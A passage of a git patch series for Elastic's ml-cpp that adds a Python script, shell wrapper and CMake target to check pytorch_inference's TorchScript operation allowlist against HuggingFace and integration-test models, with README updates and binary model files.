From: Ed Savage Date: Mon, 2 Mar 2026 14:32:46 +1300 Subject: [PATCH 11/30] [ML] Fix clang-format in Main.cc node count check Made-with: Cursor --- bin/pytorch_inference/Main.cc | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/bin/pytorch_inference/Main.cc b/bin/pytorch_inference/Main.cc index f8e159f51..9915f2f59 100644 --- a/bin/pytorch_inference/Main.cc +++ b/bin/pytorch_inference/Main.cc @@ -71,8 +71,7 @@ void verifySafeModel(const torch::jit::script::Module& module_) { } if (result.s_NodeCount > ml::torch::CModelGraphValidator::MAX_NODE_COUNT) { - HANDLE_FATAL(<< "Model graph is too large: " << result.s_NodeCount - << " nodes exceeds limit of " + HANDLE_FATAL(<< "Model graph is too large: " << result.s_NodeCount << " nodes exceeds limit of " << ml::torch::CModelGraphValidator::MAX_NODE_COUNT); } From 542cc46e4fde6a7279721689b13b517754ae42ae Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 14:52:24 +1300 Subject: [PATCH 12/30] [ML] Add allowlist validation script for pytorch_inference models Adds validate_allowlist.py alongside extract_model_ops.py in dev-tools/extract_model_ops/. The script parses ALLOWED_OPERATIONS and FORBIDDEN_OPERATIONS directly from CSupportedOperations.cc, then traces every model in validation_models.json and checks for false positives. validation_models.json is a superset of reference_models.json that also includes task-specific models (NER, sentiment analysis) matching the bin/pytorch_inference/examples/ test data. A wrapper script (run_validation.sh) automatically creates the Python venv and installs dependencies on first run. A CMake target is registered for convenient invocation: cmake --build -t validate_pytorch_inference_models Made-with: Cursor --- dev-tools/extract_model_ops/README.md | 82 ++++++-- dev-tools/extract_model_ops/run_validation.sh | 40 ++++ .../extract_model_ops/validate_allowlist.py | 194 ++++++++++++++++++ .../extract_model_ops/validation_models.json | 24 +++ test/CMakeLists.txt | 15 ++ 5 files changed, 338 insertions(+), 17 deletions(-) create mode 100755 dev-tools/extract_model_ops/run_validation.sh create mode 100644 dev-tools/extract_model_ops/validate_allowlist.py create mode 100644 dev-tools/extract_model_ops/validation_models.json diff --git a/dev-tools/extract_model_ops/README.md b/dev-tools/extract_model_ops/README.md index 73798e03f..a7028d521 100644 --- a/dev-tools/extract_model_ops/README.md +++ b/dev-tools/extract_model_ops/README.md @@ -1,17 +1,14 @@ # extract\_model\_ops -Developer tool that extracts TorchScript operation sets from the supported -HuggingFace transformer architectures. The output is used to maintain the -C++ operation allowlist in -`bin/pytorch_inference/CSupportedOperations.cc`. +Developer tools for maintaining and validating the TorchScript operation +allowlist in `bin/pytorch_inference/CSupportedOperations.cc`. -## When to run +This directory contains two scripts that share the same Python environment: -Re-run this tool whenever: - -- A new transformer architecture is added to the supported set. -- The PyTorch (libtorch) version used by ml-cpp is upgraded. -- You need to verify which operations a particular model uses. +| Script | Purpose | +|---|---| +| `extract_model_ops.py` | Generate the C++ `ALLOWED_OPERATIONS` set from reference models | +| `validate_allowlist.py` | Verify the allowlist accepts all supported models (no false positives) | ## Setup @@ -30,7 +27,19 @@ If any of the reference models are gated, set a HuggingFace token: export HF_TOKEN="hf_..." ``` -## Usage +## extract\_model\_ops.py + +Traces each model in `reference_models.json`, collects the TorchScript +operations from the inlined forward graph, and outputs the union as a +sorted list or a ready-to-paste C++ initializer. + +### When to run + +- A new transformer architecture is added to the supported set. +- The PyTorch (libtorch) version used by ml-cpp is upgraded. +- You need to inspect which operations a particular model uses. + +### Usage ```bash # Print the sorted union of all operations (default) @@ -46,10 +55,47 @@ python3 extract_model_ops.py --per-model --cpp python3 extract_model_ops.py --config /path/to/models.json ``` -## Configuration +## validate\_allowlist.py + +Parses `ALLOWED_OPERATIONS` and `FORBIDDEN_OPERATIONS` directly from +`CSupportedOperations.cc`, then traces every model in a config file and +checks that each model's operations are accepted. Exits non-zero if +any model would be rejected (a false positive). + +### When to run + +- After regenerating `ALLOWED_OPERATIONS` with `extract_model_ops.py`. +- After adding new models to `validation_models.json`. +- As a pre-merge check for any PR that touches the allowlist or the + graph validation logic. + +### Usage + +```bash +# Validate against the default set (validation_models.json) +python3 validate_allowlist.py + +# Validate with verbose per-model op counts +python3 validate_allowlist.py --verbose + +# Validate against a custom model set +python3 validate_allowlist.py --config /path/to/models.json +``` + +The script can also be run via CMake: + +```bash +cmake --build cmake-build-relwithdebinfo -t validate_pytorch_inference_models +``` + +## Configuration files + +| File | Used by | Purpose | +|---|---|---| +| `reference_models.json` | `extract_model_ops.py` | Models whose ops form the allowlist | +| `validation_models.json` | `validate_allowlist.py` | Superset including task-specific models (NER, sentiment) from `bin/pytorch_inference/examples/` | -The set of reference models is defined in `reference_models.json`. Each -entry maps a short architecture name to a HuggingFace model identifier: +Each file maps a short architecture name to a HuggingFace model identifier: ```json { @@ -58,9 +104,11 @@ entry maps a short architecture name to a HuggingFace model identifier: } ``` -To add a new architecture, append an entry to this file and re-run the -script. Copy the `--cpp` output into `CSupportedOperations.cc`, adding -any new operations to the `ALLOWED_OPERATIONS` set. +To add a new architecture, append an entry to `reference_models.json`, +re-run `extract_model_ops.py --cpp`, and update `CSupportedOperations.cc`. +Then add the same entry (plus any task-specific variants) to +`validation_models.json` and run `validate_allowlist.py` to confirm +there are no false positives. ## How it works diff --git a/dev-tools/extract_model_ops/run_validation.sh b/dev-tools/extract_model_ops/run_validation.sh new file mode 100755 index 000000000..29639b5ff --- /dev/null +++ b/dev-tools/extract_model_ops/run_validation.sh @@ -0,0 +1,40 @@ +#!/bin/bash +# +# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +# or more contributor license agreements. Licensed under the Elastic License +# 2.0 and the following additional limitation. Functionality enabled by the +# files subject to the Elastic License 2.0 may only be used in production when +# invoked by an Elasticsearch process with a license key installed that permits +# use of machine learning features. You may not use this file except in +# compliance with the Elastic License 2.0 and the foregoing additional +# limitation. +# +# Wrapper that ensures the Python virtual environment exists and then +# runs validate_allowlist.py. All arguments are forwarded to the script. + +set -euo pipefail + +SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" +VENV_DIR="${SCRIPT_DIR}/.venv" +REQUIREMENTS="${SCRIPT_DIR}/requirements.txt" +VALIDATE_SCRIPT="${SCRIPT_DIR}/validate_allowlist.py" + +if ! command -v python3 &>/dev/null; then + echo "ERROR: python3 not found on PATH" >&2 + exit 1 +fi + +if [ ! -d "${VENV_DIR}" ]; then + echo "Creating virtual environment in ${VENV_DIR}..." >&2 + python3 -m venv "${VENV_DIR}" +fi + +if [ ! -f "${VENV_DIR}/.requirements.stamp" ] || \ + [ "${REQUIREMENTS}" -nt "${VENV_DIR}/.requirements.stamp" ]; then + echo "Installing/updating dependencies..." >&2 + "${VENV_DIR}/bin/pip" install --quiet --upgrade pip + "${VENV_DIR}/bin/pip" install --quiet -r "${REQUIREMENTS}" + touch "${VENV_DIR}/.requirements.stamp" +fi + +exec "${VENV_DIR}/bin/python3" "${VALIDATE_SCRIPT}" "$@" diff --git a/dev-tools/extract_model_ops/validate_allowlist.py b/dev-tools/extract_model_ops/validate_allowlist.py new file mode 100644 index 000000000..cdbc1969c --- /dev/null +++ b/dev-tools/extract_model_ops/validate_allowlist.py @@ -0,0 +1,194 @@ +#!/usr/bin/env python3 +# +# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +# or more contributor license agreements. Licensed under the Elastic License +# 2.0 and the following additional limitation. Functionality enabled by the +# files subject to the Elastic License 2.0 may only be used in production when +# invoked by an Elasticsearch process with a license key installed that permits +# use of machine learning features. You may not use this file except in +# compliance with the Elastic License 2.0 and the foregoing additional +# limitation. +# +"""Validate that the C++ operation allowlist accepts all supported model architectures. + +Traces each model listed in a JSON config file, extracts its TorchScript +operations (using the same inlining approach as the C++ validator), and +checks every operation against the ALLOWED_OPERATIONS and FORBIDDEN_OPERATIONS +sets parsed from CSupportedOperations.cc. + +This is the Python-side equivalent of the C++ CModelGraphValidator and is +intended as an integration test: if any legitimate model produces an +operation that the C++ code would reject, this script exits non-zero. + +Exit codes: + 0 All models pass (no false positives). + 1 At least one model was rejected or a model failed to load/trace. + +Usage: + python3 validate_allowlist.py [--config CONFIG] [--verbose] +""" + +import argparse +import json +import os +import re +import sys +from pathlib import Path + +import torch +from transformers import AutoConfig, AutoModel, AutoTokenizer + +SCRIPT_DIR = Path(__file__).resolve().parent +REPO_ROOT = SCRIPT_DIR.parents[1] +DEFAULT_CONFIG = SCRIPT_DIR / "validation_models.json" +SUPPORTED_OPS_CC = REPO_ROOT / "bin" / "pytorch_inference" / "CSupportedOperations.cc" + + +def parse_string_set_from_cc(path: Path, variable_name: str) -> set[str]: + """Extract a set of string literals from a C++ TStringViewSet definition.""" + text = path.read_text() + pattern = rf'{re.escape(variable_name)}\s*=\s*\{{(.*?)\}};' + match = re.search(pattern, text, re.DOTALL) + if not match: + raise RuntimeError(f"Could not find {variable_name} in {path}") + block = match.group(1) + return set(re.findall(r'"([^"]+)"', block)) + + +def load_cpp_sets() -> tuple[set[str], set[str]]: + """Parse ALLOWED_OPERATIONS and FORBIDDEN_OPERATIONS from the C++ source.""" + allowed = parse_string_set_from_cc(SUPPORTED_OPS_CC, "ALLOWED_OPERATIONS") + forbidden = parse_string_set_from_cc(SUPPORTED_OPS_CC, "FORBIDDEN_OPERATIONS") + return allowed, forbidden + + +def collect_graph_ops(graph) -> set[str]: + """Collect all operation names from a TorchScript graph, including blocks.""" + ops = set() + for node in graph.nodes(): + ops.add(node.kind()) + for block in node.blocks(): + ops.update(collect_graph_ops(block)) + return ops + + +def trace_and_collect_ops(model_name: str) -> set[str] | None: + """Load, trace, inline, and return the op set for a HuggingFace model. + + Returns None if the model could not be loaded or traced. + """ + token = os.environ.get("HF_TOKEN") + + try: + tokenizer = AutoTokenizer.from_pretrained(model_name, token=token) + config = AutoConfig.from_pretrained( + model_name, torchscript=True, token=token) + model = AutoModel.from_pretrained( + model_name, config=config, token=token) + model.eval() + except Exception as exc: + print(f" LOAD ERROR: {exc}", file=sys.stderr) + return None + + inputs = tokenizer( + "This is a sample input for graph extraction.", + return_tensors="pt", padding="max_length", + max_length=32, truncation=True) + + input_ids = inputs["input_ids"] + attention_mask = inputs["attention_mask"] + + try: + traced = torch.jit.trace( + model, (input_ids, attention_mask), strict=False) + except Exception as exc: + print(f" TRACE WARNING: {exc}", file=sys.stderr) + print(" Falling back to torch.jit.script...", file=sys.stderr) + try: + traced = torch.jit.script(model) + except Exception as exc2: + print(f" SCRIPT ERROR: {exc2}", file=sys.stderr) + return None + + graph = traced.forward.graph.copy() + torch._C._jit_pass_inline(graph) + return collect_graph_ops(graph) + + +def validate_model(model_name: str, + allowed: set[str], + forbidden: set[str], + verbose: bool) -> bool: + """Validate one model. Returns True if all ops pass.""" + print(f" {model_name}...", file=sys.stderr) + ops = trace_and_collect_ops(model_name) + if ops is None: + print(f" FAILED (could not load/trace)", file=sys.stderr) + return False + + forbidden_found = sorted(ops & forbidden) + unrecognised = sorted(ops - allowed - forbidden) + + if verbose: + print(f" {len(ops)} distinct ops", file=sys.stderr) + + if forbidden_found: + print(f" FORBIDDEN: {forbidden_found}", file=sys.stderr) + if unrecognised: + print(f" UNRECOGNISED: {unrecognised}", file=sys.stderr) + + if not forbidden_found and not unrecognised: + print(f" PASS", file=sys.stderr) + return True + + print(f" FAIL", file=sys.stderr) + return False + + +def main(): + parser = argparse.ArgumentParser( + description=__doc__, + formatter_class=argparse.RawDescriptionHelpFormatter) + parser.add_argument( + "--config", type=Path, default=DEFAULT_CONFIG, + help="Path to reference_models.json (default: %(default)s)") + parser.add_argument( + "--verbose", action="store_true", + help="Print per-model op counts") + args = parser.parse_args() + + print(f"PyTorch version: {torch.__version__}", file=sys.stderr) + + allowed, forbidden = load_cpp_sets() + print(f"Parsed {len(allowed)} allowed ops and {len(forbidden)} " + f"forbidden ops from {SUPPORTED_OPS_CC.name}", file=sys.stderr) + + with open(args.config) as f: + models = json.load(f) + print(f"Validating {len(models)} models from {args.config.name}...", + file=sys.stderr) + + results: dict[str, bool] = {} + for arch, model_id in models.items(): + results[arch] = validate_model( + model_id, allowed, forbidden, args.verbose) + + print(file=sys.stderr) + print("=" * 60, file=sys.stderr) + all_pass = all(results.values()) + for arch, passed in results.items(): + status = "PASS" if passed else "FAIL" + print(f" {arch} ({models[arch]}): {status}", file=sys.stderr) + + print("=" * 60, file=sys.stderr) + if all_pass: + print("All models PASS - no false positives.", file=sys.stderr) + else: + failed = [a for a, p in results.items() if not p] + print(f"FAILED models: {', '.join(failed)}", file=sys.stderr) + + sys.exit(0 if all_pass else 1) + + +if __name__ == "__main__": + main() diff --git a/dev-tools/extract_model_ops/validation_models.json b/dev-tools/extract_model_ops/validation_models.json new file mode 100644 index 000000000..5bb5a34ec --- /dev/null +++ b/dev-tools/extract_model_ops/validation_models.json @@ -0,0 +1,24 @@ +{ + "bert": "bert-base-uncased", + "roberta": "roberta-base", + "distilbert": "distilbert-base-uncased", + "electra": "google/electra-small-discriminator", + "mpnet": "microsoft/mpnet-base", + "deberta": "microsoft/deberta-base", + "dpr": "facebook/dpr-ctx_encoder-single-nq-base", + "mobilebert": "google/mobilebert-uncased", + "xlm-roberta": "xlm-roberta-base", + + "elastic-bge-m3": "elastic/bge-m3", + "elastic-distilbert-cased-ner": "elastic/distilbert-base-cased-finetuned-conll03-english", + "elastic-distilbert-uncased-ner": "elastic/distilbert-base-uncased-finetuned-conll03-english", + "elastic-eis-elser-v2": "elastic/eis-elser-v2", + "elastic-elser-v2": "elastic/elser-v2", + "elastic-hugging-face-elser": "elastic/hugging-face-elser", + "elastic-multilingual-e5-small-optimized": "elastic/multilingual-e5-small-optimized", + "elastic-splade-v3": "elastic/splade-v3", + "elastic-test-elser-v2": "elastic/test-elser-v2", + + "ner-dslim-bert-base": "dslim/bert-base-NER", + "sentiment-distilbert-sst2": "distilbert-base-uncased-finetuned-sst-2-english" +} diff --git a/test/CMakeLists.txt b/test/CMakeLists.txt index 3dba76157..69d794df0 100644 --- a/test/CMakeLists.txt +++ b/test/CMakeLists.txt @@ -65,4 +65,19 @@ add_custom_target(test_all_parallel ${_build_type_arg} -P ${CMAKE_SOURCE_DIR}/cmake/run-all-tests-parallel.cmake WORKING_DIRECTORY ${CMAKE_SOURCE_DIR} +) + +# Python integration test: validate the pytorch_inference operation +# allowlist against real HuggingFace models. This target is opt-in +# (not part of the regular "test" target) because it requires network +# access to download models. The wrapper script automatically creates +# a Python venv and installs dependencies on first run. +# See dev-tools/extract_model_ops/README.md for details. +set(_validate_wrapper ${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/run_validation.sh) +set(_validate_config ${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/validation_models.json) + +add_custom_target(validate_pytorch_inference_models + COMMAND ${_validate_wrapper} --config ${_validate_config} --verbose + COMMENT "Validating pytorch_inference allowlist against HuggingFace models" + WORKING_DIRECTORY ${CMAKE_SOURCE_DIR} ) \ No newline at end of file From ee71e5be4cfd44dfd0098fd1ccfb41c401cf756a Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 15:17:06 +1300 Subject: [PATCH 13/30] [ML] Add Elasticsearch ecosystem models to validation test suite Extend the allowlist validation to cover models directly referenced in the Elasticsearch repo and its eland import tool: the packaged multilingual-e5-small, the cross-encoder reranker from the docs, the sentence-transformers embedding model from eland tests, and the DPR question encoder. All 24 models pass validation with no false positives. Made-with: Cursor --- dev-tools/extract_model_ops/validation_models.json | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/dev-tools/extract_model_ops/validation_models.json b/dev-tools/extract_model_ops/validation_models.json index 5bb5a34ec..5c23eb907 100644 --- a/dev-tools/extract_model_ops/validation_models.json +++ b/dev-tools/extract_model_ops/validation_models.json @@ -20,5 +20,10 @@ "elastic-test-elser-v2": "elastic/test-elser-v2", "ner-dslim-bert-base": "dslim/bert-base-NER", - "sentiment-distilbert-sst2": "distilbert-base-uncased-finetuned-sst-2-english" + "sentiment-distilbert-sst2": "distilbert-base-uncased-finetuned-sst-2-english", + + "es-multilingual-e5-small": "intfloat/multilingual-e5-small", + "es-all-MiniLM-L6-v2": "sentence-transformers/all-MiniLM-L6-v2", + "es-cross-encoder-ms-marco": "cross-encoder/ms-marco-MiniLM-L-6-v2", + "es-dpr-question-encoder": "facebook/dpr-question_encoder-single-nq-base" } From 0b0a7dacf9aa748fd742c76a7259088c19e1cf5d Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 15:28:09 +1300 Subject: [PATCH 14/30] [ML] Validate allowlist against Elasticsearch integration test models Extract the base64-encoded TorchScript models from PyTorchModelIT, TextExpansionQueryIT, and TextEmbeddingQueryIT in the Elasticsearch repo and validate them against our operation allowlist. These toy models use basic ops (aten::ones, aten::rand, aten::hash, prim::Loop, etc.) that weren't in the transformer-derived allowlist, so add them. All are safe tensor/control-flow operations with no I/O capability. The validation script now accepts --pt-dir to validate pre-saved .pt files alongside HuggingFace models. The CMake target passes the new es_it_models directory automatically. Made-with: Cursor --- bin/pytorch_inference/CSupportedOperations.cc | 13 +++ .../extract_model_ops/es_it_models/README.md | 41 +++++++++ .../supersimple_pytorch_model_it.pt | Bin 0 -> 1630 bytes .../es_it_models/tiny_text_embedding.pt | Bin 0 -> 1694 bytes .../es_it_models/tiny_text_expansion.pt | Bin 0 -> 2078 bytes .../extract_model_ops/validate_allowlist.py | 80 ++++++++++++++---- test/CMakeLists.txt | 8 +- 7 files changed, 125 insertions(+), 17 deletions(-) create mode 100644 dev-tools/extract_model_ops/es_it_models/README.md create mode 100644 dev-tools/extract_model_ops/es_it_models/supersimple_pytorch_model_it.pt create mode 100644 dev-tools/extract_model_ops/es_it_models/tiny_text_embedding.pt create mode 100644 dev-tools/extract_model_ops/es_it_models/tiny_text_expansion.pt diff --git a/bin/pytorch_inference/CSupportedOperations.cc b/bin/pytorch_inference/CSupportedOperations.cc index c1b416e58..074a2fa4b 100644 --- a/bin/pytorch_inference/CSupportedOperations.cc +++ b/bin/pytorch_inference/CSupportedOperations.cc @@ -34,9 +34,12 @@ const CSupportedOperations::TStringViewSet CSupportedOperations::FORBIDDEN_OPERA // elastic/eis-elser-v2, elastic/elser-v2, elastic/hugging-face-elser, // elastic/multilingual-e5-small-optimized, elastic/splade-v3, // elastic/test-elser-v2. +// Additional ops from Elasticsearch integration test models +// (PyTorchModelIT, TextExpansionQueryIT, TextEmbeddingQueryIT). const CSupportedOperations::TStringViewSet CSupportedOperations::ALLOWED_OPERATIONS = { // aten operations (core tensor computations) "aten::Int"sv, + "aten::IntImplicit"sv, "aten::ScalarImplicit"sv, "aten::__and__"sv, "aten::abs"sv, @@ -58,22 +61,29 @@ const CSupportedOperations::TStringViewSet CSupportedOperations::ALLOWED_OPERATI "aten::gather"sv, "aten::ge"sv, "aten::gelu"sv, + "aten::hash"sv, "aten::index"sv, + "aten::index_put_"sv, "aten::layer_norm"sv, + "aten::len"sv, "aten::linear"sv, "aten::log"sv, "aten::lt"sv, + "aten::manual_seed"sv, "aten::masked_fill"sv, "aten::matmul"sv, + "aten::max"sv, "aten::mean"sv, "aten::min"sv, "aten::mul"sv, "aten::ne"sv, "aten::neg"sv, "aten::new_ones"sv, + "aten::ones"sv, "aten::pad"sv, "aten::permute"sv, "aten::pow"sv, + "aten::rand"sv, "aten::relu"sv, "aten::repeat"sv, "aten::reshape"sv, @@ -85,6 +95,7 @@ const CSupportedOperations::TStringViewSet CSupportedOperations::ALLOWED_OPERATI "aten::softmax"sv, "aten::sqrt"sv, "aten::squeeze"sv, + "aten::str"sv, "aten::sub"sv, "aten::tanh"sv, "aten::tensor"sv, @@ -102,10 +113,12 @@ const CSupportedOperations::TStringViewSet CSupportedOperations::ALLOWED_OPERATI "prim::If"sv, "prim::ListConstruct"sv, "prim::ListUnpack"sv, + "prim::Loop"sv, "prim::NumToTensor"sv, "prim::TupleConstruct"sv, "prim::TupleUnpack"sv, "prim::device"sv, + "prim::dtype"sv, "prim::max"sv, "prim::min"sv, }; diff --git a/dev-tools/extract_model_ops/es_it_models/README.md b/dev-tools/extract_model_ops/es_it_models/README.md new file mode 100644 index 000000000..a3997d2ef --- /dev/null +++ b/dev-tools/extract_model_ops/es_it_models/README.md @@ -0,0 +1,41 @@ +# Elasticsearch Integration Test Models + +Pre-saved TorchScript `.pt` files extracted from the base64-encoded models +in the Elasticsearch Java integration tests. These are tiny synthetic models +(not real transformer architectures) used to test the `pytorch_inference` +loading and evaluation pipeline. + +| File | Source | Description | +|------|--------|-------------| +| `supersimple_pytorch_model_it.pt` | `PyTorchModelIT.java` | Returns `torch.ones` of shape `(batch, 2)` | +| `tiny_text_expansion.pt` | `TextExpansionQueryIT.java` | Sparse weight vector sized by max input ID | +| `tiny_text_embedding.pt` | `TextEmbeddingQueryIT.java` | Random 100-dim embedding seeded by input hash | + +## Regenerating + +If the Java test models change, re-extract them by running the generation +snippet from this repository's root: + +```bash +python3 -c " +import re, base64, os + +JAVA_DIR = '/x-pack/plugin/ml/qa/native-multi-node-tests/src/javaRestTest/java/org/elasticsearch/xpack/ml/integration' +OUTPUT_DIR = 'dev-tools/extract_model_ops/es_it_models' + +SOURCES = { + 'supersimple_pytorch_model_it.pt': ('PyTorchModelIT.java', 'BASE_64_ENCODED_MODEL'), + 'tiny_text_expansion.pt': ('TextExpansionQueryIT.java', 'BASE_64_ENCODED_MODEL'), + 'tiny_text_embedding.pt': ('TextEmbeddingQueryIT.java', 'BASE_64_ENCODED_MODEL'), +} +os.makedirs(OUTPUT_DIR, exist_ok=True) +for out_name, (java_file, var_name) in SOURCES.items(): + with open(os.path.join(JAVA_DIR, java_file)) as f: + src = f.read() + m = re.search(rf'{var_name}\s*=\s*(\".*?\");', src, re.DOTALL) + b64 = re.sub(r'\"\s*\+\s*\"', '', m.group(1)).strip('\"').replace('\n', '').replace(' ', '') + with open(os.path.join(OUTPUT_DIR, out_name), 'wb') as f: + f.write(base64.b64decode(b64)) + print(f'Wrote {out_name}') +" +``` diff --git a/dev-tools/extract_model_ops/es_it_models/supersimple_pytorch_model_it.pt b/dev-tools/extract_model_ops/es_it_models/supersimple_pytorch_model_it.pt new file mode 100644 index 0000000000000000000000000000000000000000..0eecbb1b3f93065391bf1b61feca58dfadd61aa6 GIT binary patch literal 1630 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 literal 0 HcmV?d00001 diff --git a/dev-tools/extract_model_ops/validate_allowlist.py b/dev-tools/extract_model_ops/validate_allowlist.py index cdbc1969c..b7d4ef49d 100644 --- a/dev-tools/extract_model_ops/validate_allowlist.py +++ b/dev-tools/extract_model_ops/validate_allowlist.py @@ -115,17 +115,23 @@ def trace_and_collect_ops(model_name: str) -> set[str] | None: return collect_graph_ops(graph) -def validate_model(model_name: str, - allowed: set[str], - forbidden: set[str], - verbose: bool) -> bool: - """Validate one model. Returns True if all ops pass.""" - print(f" {model_name}...", file=sys.stderr) - ops = trace_and_collect_ops(model_name) - if ops is None: - print(f" FAILED (could not load/trace)", file=sys.stderr) - return False +def load_pt_and_collect_ops(pt_path: str) -> set[str] | None: + """Load a saved TorchScript .pt file, inline, and return its op set.""" + try: + module = torch.jit.load(pt_path) + graph = module.forward.graph.copy() + torch._C._jit_pass_inline(graph) + return collect_graph_ops(graph) + except Exception as exc: + print(f" LOAD ERROR: {exc}", file=sys.stderr) + return None + +def check_ops(ops: set[str], + allowed: set[str], + forbidden: set[str], + verbose: bool) -> bool: + """Check an op set against allowed/forbidden lists. Returns True if all pass.""" forbidden_found = sorted(ops & forbidden) unrecognised = sorted(ops - allowed - forbidden) @@ -145,6 +151,33 @@ def validate_model(model_name: str, return False +def validate_model(model_name: str, + allowed: set[str], + forbidden: set[str], + verbose: bool) -> bool: + """Validate one HuggingFace model. Returns True if all ops pass.""" + print(f" {model_name}...", file=sys.stderr) + ops = trace_and_collect_ops(model_name) + if ops is None: + print(f" FAILED (could not load/trace)", file=sys.stderr) + return False + return check_ops(ops, allowed, forbidden, verbose) + + +def validate_pt_file(name: str, + pt_path: str, + allowed: set[str], + forbidden: set[str], + verbose: bool) -> bool: + """Validate a local TorchScript .pt file. Returns True if all ops pass.""" + print(f" {name} ({pt_path})...", file=sys.stderr) + ops = load_pt_and_collect_ops(pt_path) + if ops is None: + print(f" FAILED (could not load)", file=sys.stderr) + return False + return check_ops(ops, allowed, forbidden, verbose) + + def main(): parser = argparse.ArgumentParser( description=__doc__, @@ -152,6 +185,9 @@ def main(): parser.add_argument( "--config", type=Path, default=DEFAULT_CONFIG, help="Path to reference_models.json (default: %(default)s)") + parser.add_argument( + "--pt-dir", type=Path, default=None, + help="Directory of pre-saved .pt TorchScript files to validate") parser.add_argument( "--verbose", action="store_true", help="Print per-model op counts") @@ -163,22 +199,36 @@ def main(): print(f"Parsed {len(allowed)} allowed ops and {len(forbidden)} " f"forbidden ops from {SUPPORTED_OPS_CC.name}", file=sys.stderr) + results: dict[str, bool] = {} + with open(args.config) as f: models = json.load(f) - print(f"Validating {len(models)} models from {args.config.name}...", - file=sys.stderr) + print(f"Validating {len(models)} HuggingFace models from " + f"{args.config.name}...", file=sys.stderr) - results: dict[str, bool] = {} for arch, model_id in models.items(): results[arch] = 